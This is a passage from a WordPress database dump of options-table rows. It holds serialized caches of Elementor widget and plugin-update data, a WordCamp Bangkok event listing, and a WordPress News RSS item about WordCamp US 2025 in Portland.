Related\";s:4:\"icon\";s:21:\"eicon-product-related\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:76;a:4:{s:4:\"name\";s:26:\"woocommerce-product-upsell\";s:5:\"title\";s:7:\"Upsells\";s:4:\"icon\";s:20:\"eicon-product-upsell\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:77;a:4:{s:4:\"name\";s:25:\"woocommerce-checkout-page\";s:5:\"title\";s:8:\"Checkout\";s:4:\"icon\";s:14:\"eicon-checkout\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:78;a:4:{s:4:\"name\";s:16:\"woocommerce-cart\";s:5:\"title\";s:4:\"Cart\";s:4:\"icon\";s:14:\"eicon-woo-cart\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:79;a:4:{s:4:\"name\";s:22:\"woocommerce-my-account\";s:5:\"title\";s:10:\"My Account\";s:4:\"icon\";s:16:\"eicon-my-account\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:80;a:4:{s:4:\"name\";s:28:\"woocommerce-purchase-summary\";s:5:\"title\";s:16:\"Purchase Summary\";s:4:\"icon\";s:22:\"eicon-purchase-summary\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:81;a:4:{s:4:\"name\";s:19:\"woocommerce-notices\";s:5:\"title\";s:19:\"WooCommerce Notices\";s:4:\"icon\";s:25:\"eicon-woocommerce-notices\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}}s:17:\"canary_deployment\";a:2:{s:11:\"plugin_info\";a:11:{s:2:\"id\";s:23:\"w.org/plugins/elementor\";s:4:\"slug\";s:9:\"elementor\";s:6:\"plugin\";s:23:\"elementor/elementor.php\";s:11:\"new_version\";s:5:\"3.6.0\";s:7:\"package\";s:58:\"https://downloads.wordpress.org/plugin/elementor.3.6.0.zip\";s:3:\"url\";s:40:\"https://wordpress.org/plugins/elementor/\";s:5:\"icons\";a:3:{s:2:\"2x\";s:62:\"https://ps.w.org/elementor/assets/icon-256x256.png?rev=1427768\";s:2:\"1x\";s:54:\"https://ps.w.org/elementor/assets/icon.svg?rev=1426809\";s:3:\"svg\";s:54:\"https://ps.w.org/elementor/assets/icon.svg?rev=1426809\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:65:\"https://ps.w.org/elementor/assets/banner-1544x500.png?rev=1475479\";s:2:\"1x\";s:64:\"https://ps.w.org/elementor/assets/banner-772x250.png?rev=1475479\";}s:11:\"banners_rtl\";a:0:{}s:6:\"tested\";s:5:\"6.8.2\";s:12:\"requires_php\";s:3:\"5.6\";}s:10:\"conditions\";a:0:{}}}','off'),
(98842,'_site_transient_timeout_community-events-4a63893111a45a774c3a4b1569e53a2b','1758724877','off'),
(98843,'_site_transient_community-events-4a63893111a45a774c3a4b1569e53a2b','a:4:{s:9:\"sandboxed\";b:0;s:5:\"error\";N;s:8:\"location\";a:1:{s:2:\"ip\";s:12:\"124.120.15.0\";}s:6:\"events\";a:1:{i:0;a:10:{s:4:\"type\";s:8:\"wordcamp\";s:5:\"title\";s:21:\"WordCamp Bangkok 2025\";s:3:\"url\";s:34:\"https://bangkok.wordcamp.org/2025/\";s:6:\"meetup\";N;s:10:\"meetup_url\";N;s:4:\"date\";s:19:\"2025-12-13 00:00:00\";s:8:\"end_date\";s:19:\"2025-12-14 00:00:00\";s:20:\"start_unix_timestamp\";i:1765558800;s:18:\"end_unix_timestamp\";i:1765645200;s:8:\"location\";a:4:{s:8:\"location\";s:17:\"Bangkok, Thailand\";s:7:\"country\";s:2:\"TH\";s:8:\"latitude\";d:13.7352502;s:9:\"longitude\";d:100.5296482;}}}}','off'),
(98844,'_transient_timeout_feed_ac0b00fe65abe10e0c5b588f3ed8c7ca','1758724878','off'),
(98845,'_transient_feed_ac0b00fe65abe10e0c5b588f3ed8c7ca','a:6:{s:5:\"child\";a:1:{s:0:\"\";a:1:{s:3:\"rss\";a:1:{i:0;a:6:{s:4:\"data\";s:3:\"\n\n\n\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:7:\"version\";s:3:\"2.0\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:1:{s:7:\"channel\";a:1:{i:0;a:6:{s:4:\"data\";s:52:\"\n	\n	\n	\n	\n	\n	\n	\n	\n	\n\n \n	\n		\n		\n		\n		\n		\n		\n		\n		\n		\n	\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:8:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"WordPress News\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:26:\"https://wordpress.org/news\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:59:\"The latest news about WordPress and the WordPress community\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:13:\"lastBuildDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 17 Sep 2025 18:47:21 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"language\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"en-US\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:9:\"generator\";a:1:{i:0;a:5:{s:4:\"data\";s:40:\"https://wordpress.org/?v=6.9-alpha-60793\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:5:\"image\";a:1:{i:0;a:6:{s:4:\"data\";s:11:\"\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:5:{s:3:\"url\";a:1:{i:0;a:5:{s:4:\"data\";s:29:\"https://s.w.org/favicon.ico?2\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"WordPress News\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:26:\"https://wordpress.org/news\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:5:\"width\";a:1:{i:0;a:5:{s:4:\"data\";s:2:\"32\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:6:\"height\";a:1:{i:0;a:5:{s:4:\"data\";s:2:\"32\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}s:4:\"item\";a:10:{i:0;a:6:{s:4:\"data\";s:63:\"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n\n					\n										\n					\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:57:\"Portland Welcomes WordCamp US 2025: A Community Gathering\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:63:\"https://wordpress.org/news/2025/08/portland-welcomes-wcus-2025/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sat, 30 Aug 2025 03:03:52 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:3:{i:0;a:5:{s:4:\"data\";s:6:\"Events\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:7:\"General\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:8:\"WordCamp\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://wordpress.org/news/?p=19074\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:405:\"A full house of attendees gathered in Portland, Oregon, for WordCamp US 2025, with thousands more tuning in online. Over four days, the flagship WordPress event brought together contributors, innovators, and community members for collaboration, inspiration, and discovery. WordPress is so unique because we&#8217;re not just a product; we&#8217;re a movement. Matt Mullenweg, WordPress Cofounder [&#8230;]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Brett McSherry\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:66040:\"\n\n\n<p>A full house of attendees gathered in Portland, Oregon, for WordCamp US 2025, with thousands more tuning in online. Over four days, the flagship WordPress event brought together contributors, innovators, and community members for collaboration, inspiration, and discovery.</p>\n\n\n\n<div class=\"wp-block-group is-nowrap is-layout-flex wp-container-core-group-is-layout-6c531013 wp-block-group-is-layout-flex\">\n<figure class=\"wp-block-pullquote\"><blockquote><p>WordPress is so unique because we&#8217;re not just a product; we&#8217;re a movement.</p><cite>Matt Mullenweg, WordPress Cofounder</cite></blockquote></figure>\n</div>\n\n\n\n<p>The WordPress event began with a dedicated Contributor Day and continued with a Showcase Day and two days of sessions filled with talks, panels, workshops, and community celebrations. WordPress Cofounder Matt Mullenweg joined a diverse lineup of speakers, panelists, and workshop leaders who brought fresh perspectives to the open web from across the globe.</p>\n\n\n\n<p>Set against the vibrant backdrop of Portland — with its iconic bridges, coffee culture, and creative energy — the Sponsor Hall buzzed as companies across the WordPress ecosystem demoed new products, shared insights, and connected with attendees. Each day offered opportunities to refuel with local flavors and international favorites, turning mealtimes into lively hubs of networking and idea-sharing.</p>\n\n\n\n<h2 class=\"wp-block-heading\">A Global Gathering in Portland</h2>\n\n\n\n<p>WordCamp US is the annual gathering point for the WordPress community — where collaboration, creativity, and innovation intersect. This year in Portland, the event delivered an expansive program that reached every corner of the ecosystem.</p>\n\n\n\n<p>Here’s what attendees experienced:</p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Engaging Sessions Across Tracks</strong> – Keynotes, presentations, and discussions explored the evolving web and the role of open source in shaping it.</li>\n\n\n\n<li><strong>A Global Speaker Lineup</strong> – Voices from across continents brought local stories and global visions to the stage.</li>\n\n\n\n<li><strong>Wide-Ranging Topics</strong> – From AI in WordPress development to accessibility, design systems, content strategy, education, and case studies of WordPress at scale.</li>\n\n\n\n<li><strong>Hands-On Learning Opportunities</strong> – Workshops provided practical takeaways, empowering attendees to apply new skills immediately.</li>\n\n\n\n<li><strong>A Community Built on Collaboration</strong> – Whether contributing code, exploring business strategies, or sharing creative projects, attendees found space to learn, grow, and celebrate open source together.</li>\n</ul>\n\n\n\n<p>New contributors took their first steps into open source, seasoned developers explored cutting-edge AI integrations, and agencies and product teams shared strategies for scaling WordPress to meet modern needs. Beyond the technical, conversations around inclusivity, sustainability, and education underscored WordPress’s role as a tool for empowerment and positive change.</p>\n\n\n\n<p>In hallways, coffee lines, and evening meetups, attendees found the “hallway track” alive and well, spontaneous moments of connection that often became the most memorable part of the experience. Whether reconnecting with longtime collaborators or meeting someone new, these small interactions reinforced the heart of WordCamp US: a community that thrives on openness, generosity, and shared purpose.</p>\n\n\n\n<h2 class=\"wp-block-heading\">Contributor Day: Collaboration at the Core</h2>\n\n\n\n<p>The conference opened on Tuesday, August 26, with a vibrant Contributor Day. Nearly 300 contributors filled the space, including more than 120 first-time participants who were onboarded across 19 teams. Developers, designers, translators, marketers, and community organizers worked side by side, representing WordPress expertise.</p>\n\n\n\n<p>Throughout the day, contributors tackled everything from improving accessibility and performance to refining documentation to enhancing translation tools. Beyond technical contributions, teams like Marketing and Community focused on outreach, mentoring, and shaping future-facing initiatives. Remote participants joined via dedicated channels, reinforcing the inclusive nature of WordPress’s global community. By day’s end, the collective energy was clear: WordPress continues to be built by and for everyone.</p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped has-black-background-color has-background wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\" style=\"border-width:20px;border-radius:2px\">\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;68d353693906b&quot;}\" data-wp-interactive=\"core/image\" data-wp-key=\"68d353693906b\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" fetchpriority=\"high\" decoding=\"async\" width=\"1024\" height=\"683\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" data-id=\"19080\" src=\"https://i0.wp.com/wordpress.org/news/files/2025/08/IMG_5641.jpg?resize=1024%2C683&#038;ssl=1\" alt=\"\" class=\"wp-image-19080\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2025/08/IMG_5641-scaled.jpg?resize=1024%2C683&amp;ssl=1 1024w, https://i0.wp.com/wordpress.org/news/files/2025/08/IMG_5641-scaled.jpg?resize=300%2C200&amp;ssl=1 300w, https://i0.wp.com/wordpress.org/news/files/2025/08/IMG_5641-scaled.jpg?resize=768%2C512&amp;ssl=1 768w, https://i0.wp.com/wordpress.org/news/files/2025/08/IMG_5641-scaled.jpg?resize=1536%2C1024&amp;ssl=1 1536w, https://i0.wp.com/wordpress.org/news/files/2025/08/IMG_5641-scaled.jpg?resize=2048%2C1365&amp;ssl=1 2048w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" /><button\n			class=\"lightbox-trigger\"\n			type=\"button\"\n			aria-haspopup=\"dialog\"\n			aria-label=\"Enlarge\"\n			data-wp-init=\"callbacks.initTriggerButton\"\n			data-wp-on-async--click=\"actions.showLightbox\"\n			data-wp-style--right=\"state.imageButtonRight\"\n			data-wp-style--top=\"state.imageButtonTop\"\n		>\n			<svg xmlns=\"http://www.w3.org/2000/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n				<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" />\n			</svg>\n		</button></figure>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;68d3536939377&quot;}\" data-wp-interactive=\"core/image\" data-wp-key=\"68d3536939377\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" decoding=\"async\" width=\"1024\" height=\"683\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" data-id=\"19081\" src=\"https://i0.wp.com/wordpress.org/news/files/2025/08/IMG_5630.jpg?resize=1024%2C683&#038;ssl=1\" alt=\"\" class=\"wp-image-19081\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2025/08/IMG_5630-scaled.jpg?resize=1024%2C683&amp;ssl=1 1024w, https://i0.wp.com/wordpress.org/news/files/2025/08/IMG_5630-scaled.jpg?resize=300%2C200&amp;ssl=1 300w, https://i0.wp.com/wordpress.org/news/files/2025/08/IMG_5630-scaled.jpg?resize=768%2C512&amp;ssl=1 768w, https://i0.wp.com/wordpress.org/news/files/2025/08/IMG_5630-scaled.jpg?resize=1536%2C1024&amp;ssl=1 1536w, https://i0.wp.com/wordpress.org/news/files/2025/08/IMG_5630-scaled.jpg?resize=2048%2C1365&amp;ssl=1 2048w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" /><button\n			class=\"lightbox-trigger\"\n			type=\"button\"\n			aria-haspopup=\"dialog\"\n			aria-label=\"Enlarge\"\n			data-wp-init=\"callbacks.initTriggerButton\"\n			data-wp-on-async--click=\"actions.showLightbox\"\n			data-wp-style--right=\"state.imageButtonRight\"\n			data-wp-style--top=\"state.imageButtonTop\"\n		>\n			<svg xmlns=\"http://www.w3.org/2000/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n				<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" />\n			</svg>\n		</button></figure>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;68d353693962f&quot;}\" data-wp-interactive=\"core/image\" data-wp-key=\"68d353693962f\" class=\"wp-block-image size-large wp-lightbox-container\"><img decoding=\"async\" width=\"1707\" height=\"2560\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" data-id=\"19087\" src=\"https://i0.wp.com/wordpress.org/news/files/2025/08/DSC8717-2-scaled.jpg?fit=683%2C1024&amp;ssl=1\" alt=\"\" class=\"wp-image-19087\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2025/08/DSC8717-2-scaled.jpg?w=1707&amp;ssl=1 1707w, https://i0.wp.com/wordpress.org/news/files/2025/08/DSC8717-2-scaled.jpg?resize=200%2C300&amp;ssl=1 200w, https://i0.wp.com/wordpress.org/news/files/2025/08/DSC8717-2-scaled.jpg?resize=683%2C1024&amp;ssl=1 683w, https://i0.wp.com/wordpress.org/news/files/2025/08/DSC8717-2-scaled.jpg?resize=768%2C1152&amp;ssl=1 768w, https://i0.wp.com/wordpress.org/news/files/2025/08/DSC8717-2-scaled.jpg?resize=1024%2C1536&amp;ssl=1 1024w, https://i0.wp.com/wordpress.org/news/files/2025/08/DSC8717-2-scaled.jpg?resize=1365%2C2048&amp;ssl=1 1365w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" /><button\n			class=\"lightbox-trigger\"\n			type=\"button\"\n			aria-haspopup=\"dialog\"\n			aria-label=\"Enlarge\"\n			data-wp-init=\"callbacks.initTriggerButton\"\n			data-wp-on-async--click=\"actions.showLightbox\"\n			data-wp-style--right=\"state.imageButtonRight\"\n			data-wp-style--top=\"state.imageButtonTop\"\n		>\n			<svg xmlns=\"http://www.w3.org/2000/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n				<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" />\n			</svg>\n		</button></figure>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;68d3536939916&quot;}\" data-wp-interactive=\"core/image\" data-wp-key=\"68d3536939916\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" data-id=\"19084\" src=\"https://i0.wp.com/wordpress.org/news/files/2025/08/Z633022.jpg?resize=1024%2C683&#038;ssl=1\" alt=\"\" class=\"wp-image-19084\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2025/08/Z633022-scaled.jpg?resize=1024%2C683&amp;ssl=1 1024w, https://i0.wp.com/wordpress.org/news/files/2025/08/Z633022-scaled.jpg?resize=300%2C200&amp;ssl=1 300w, https://i0.wp.com/wordpress.org/news/files/2025/08/Z633022-scaled.jpg?resize=768%2C512&amp;ssl=1 768w, https://i0.wp.com/wordpress.org/news/files/2025/08/Z633022-scaled.jpg?resize=1536%2C1024&amp;ssl=1 1536w, https://i0.wp.com/wordpress.org/news/files/2025/08/Z633022-scaled.jpg?resize=2048%2C1365&amp;ssl=1 2048w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" /><button\n			class=\"lightbox-trigger\"\n			type=\"button\"\n			aria-haspopup=\"dialog\"\n			aria-label=\"Enlarge\"\n			data-wp-init=\"callbacks.initTriggerButton\"\n			data-wp-on-async--click=\"actions.showLightbox\"\n			data-wp-style--right=\"state.imageButtonRight\"\n			data-wp-style--top=\"state.imageButtonTop\"\n		>\n			<svg xmlns=\"http://www.w3.org/2000/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n				<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" />\n			</svg>\n		</button></figure>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;68d3536939bd0&quot;}\" data-wp-interactive=\"core/image\" data-wp-key=\"68d3536939bd0\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" data-id=\"19082\" src=\"https://i0.wp.com/wordpress.org/news/files/2025/08/IMG_5634.jpg?resize=1024%2C683&#038;ssl=1\" alt=\"\" class=\"wp-image-19082\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2025/08/IMG_5634-scaled.jpg?resize=1024%2C683&amp;ssl=1 1024w, https://i0.wp.com/wordpress.org/news/files/2025/08/IMG_5634-scaled.jpg?resize=300%2C200&amp;ssl=1 300w, https://i0.wp.com/wordpress.org/news/files/2025/08/IMG_5634-scaled.jpg?resize=768%2C512&amp;ssl=1 768w, https://i0.wp.com/wordpress.org/news/files/2025/08/IMG_5634-scaled.jpg?resize=1536%2C1024&amp;ssl=1 1536w, https://i0.wp.com/wordpress.org/news/files/2025/08/IMG_5634-scaled.jpg?resize=2048%2C1365&amp;ssl=1 2048w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" /><button\n			class=\"lightbox-trigger\"\n			type=\"button\"\n			aria-haspopup=\"dialog\"\n			aria-label=\"Enlarge\"\n			data-wp-init=\"callbacks.initTriggerButton\"\n			data-wp-on-async--click=\"actions.showLightbox\"\n			data-wp-style--right=\"state.imageButtonRight\"\n			data-wp-style--top=\"state.imageButtonTop\"\n		>\n			<svg xmlns=\"http://www.w3.org/2000/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n				<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" />\n			</svg>\n		</button></figure>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;68d3536939e9d&quot;}\" data-wp-interactive=\"core/image\" data-wp-key=\"68d3536939e9d\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" data-id=\"19085\" src=\"https://i0.wp.com/wordpress.org/news/files/2025/08/Z632926.jpg?resize=1024%2C683&#038;ssl=1\" alt=\"\" class=\"wp-image-19085\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2025/08/Z632926-scaled.jpg?resize=1024%2C683&amp;ssl=1 1024w, https://i0.wp.com/wordpress.org/news/files/2025/08/Z632926-scaled.jpg?resize=300%2C200&amp;ssl=1 300w, https://i0.wp.com/wordpress.org/news/files/2025/08/Z632926-scaled.jpg?resize=768%2C512&amp;ssl=1 768w, https://i0.wp.com/wordpress.org/news/files/2025/08/Z632926-scaled.jpg?resize=1536%2C1024&amp;ssl=1 1536w, https://i0.wp.com/wordpress.org/news/files/2025/08/Z632926-scaled.jpg?resize=2048%2C1365&amp;ssl=1 2048w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" /><button\n			class=\"lightbox-trigger\"\n			type=\"button\"\n			aria-haspopup=\"dialog\"\n			aria-label=\"Enlarge\"\n			data-wp-init=\"callbacks.initTriggerButton\"\n			data-wp-on-async--click=\"actions.showLightbox\"\n			data-wp-style--right=\"state.imageButtonRight\"\n			data-wp-style--top=\"state.imageButtonTop\"\n		>\n			<svg xmlns=\"http://www.w3.org/2000/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n				<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" />\n			</svg>\n		</button></figure>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;68d353693a16a&quot;}\" data-wp-interactive=\"core/image\" data-wp-key=\"68d353693a16a\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" data-wp-class--hide=\"state.isContentHidden\" 